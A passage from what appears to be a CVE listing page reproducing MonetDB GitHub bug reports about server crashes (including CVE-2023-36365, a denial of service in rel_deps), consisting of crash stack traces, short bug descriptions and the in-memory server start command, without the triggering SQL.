    #0 0x7f9d8a205eb0 (sql_trans_copy_key+0x1c0)
    #1 0x7f9d8a258c7e (mvc_copy_key+0x1e)
    #2 0x7f9d8a13fa5c (create_table_or_view+0x79c)
    #3 0x7f9d8a1779e1 (SQLcreate_table+0x111)
    #4 0x7f9d8a4d1c63 (runMALsequence+0x763)
    #5 0x7f9d8a4d131e (runMAL+0x9e)
    #6 0x7f9d8a1589f9 (SQLrun+0xd9)
    #7 0x7f9d8a159bee (SQLengineIntern+0x4e)
    #8 0x7f9d8a1578c2 (SQLengine_+0x5e2)
    #9 0x7f9d8a156343 (SQLengine+0x23)
    #10 0x7f9d8a4e56cf (runScenario+0x4f)
    #11 0x7f9d8a4e616c (MSscheduleClient+0x68c)
    #12 0x7f9d8a58dc2b (doChallenge+0xfb)
    #13 0x7f9d8ac0cba0 (THRstarter+0x100)
    #14 0x7f9d8ac7ccc4 (thread_starter+0x34)
    #15 0x7f9d89ff1609 (start_thread+0xd9)
    #16 0x7f9d89f16133 (clone+0x43)
    

**Additional context**  
MonetDB runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

CVE-2023-36365: MonetDB server crashes at sql_trans_copy_key · Issue #7378 · MonetDB/MonetDB

An issue in the rel_deps component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes in rel_deps after executing SQL statements through mclient.

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

    #0 0x7fc48d1c68d1 (rel_deps+0x191)
    #1 0x7fc48d1c6997 (rel_deps+0x257)
    #2 0x7fc48d1c670a (rel_dependencies+0x4a)
    #3 0x7fc48d072b25 (create_table_or_view+0x865)
    #4 0x7fc48d0aab57 (SQLcreate_view+0xe7)
    #5 0x7fc48d404c63 (runMALsequence+0x763)
    #6 0x7fc48d40431e (runMAL+0x9e)
    #7 0x7fc48d08b9f9 (SQLrun+0xd9)
    #8 0x7fc48d08cbee (SQLengineIntern+0x4e)
    #9 0x7fc48d08a8c2 (SQLengine_+0x5e2)
    #10 0x7fc48d089343 (SQLengine+0x23)
    #11 0x7fc48d4186cf (runScenario+0x4f)
    #12 0x7fc48d41916c (MSscheduleClient+0x68c)
    #13 0x7fc48d4c0c2b (doChallenge+0xfb)
    #14 0x7fc48db3fba0 (THRstarter+0x100)
    #15 0x7fc48dbafcc4 (thread_starter+0x34)
    #16 0x7fc48cf24609 (start_thread+0xd9)
    #17 0x7fc48ce49133 (clone+0x43)
    

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

Tag

#dos